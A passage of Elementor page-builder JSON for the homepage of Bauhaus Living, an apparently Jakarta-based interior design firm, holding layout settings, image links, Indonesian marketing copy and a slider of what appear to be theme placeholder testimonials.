\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-1065.jpg\",\"id\":4787,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927.jpg\",\"id\":4788,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":114},\"_offset_y_end_widescreen\":{\"size\":-20}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-9402.jpg\",\"id\":4790,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"WELCOME TO BAUHAUS\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!<\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.<\\/p><p>Kami tidak hanya menciptakan desain interior yang estetis, tetapi juga mengubah ruang tempat tinggal atau tempat kerja Anda menjadi cerminan karakter dan selera pribadi Anda.<\\/p><p>Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.<\\/p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\n interior design consultant & contractor \",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>- Konsultasi perencanaan &amp; interior design<\\/p><p>- Penyusunan Rencana Anggaran Belanja<\\/p><p>- Produksi furniture dan pekerjaan sipil<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"post_per_page\":3,\"order_by\":\"ova_sev_met_order_sev\",\"order\":\"ASC\",\"target_blank\":\"\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why Bauhaus Living ?\",\"description\":\"Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi gratis oleh team profesional\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Interior design yang mewakili keunikan setiap klien\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Design + Build Service menjadi kualitas pekerjaan \",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Kepuasan Pelanggan\",\"percent\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Kualitas Hasil dan Layanan\",\"percent\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-5878-scaled.jpg\",\"id\":4796,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"Apa kata mereka tentang Bauhaus?\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work 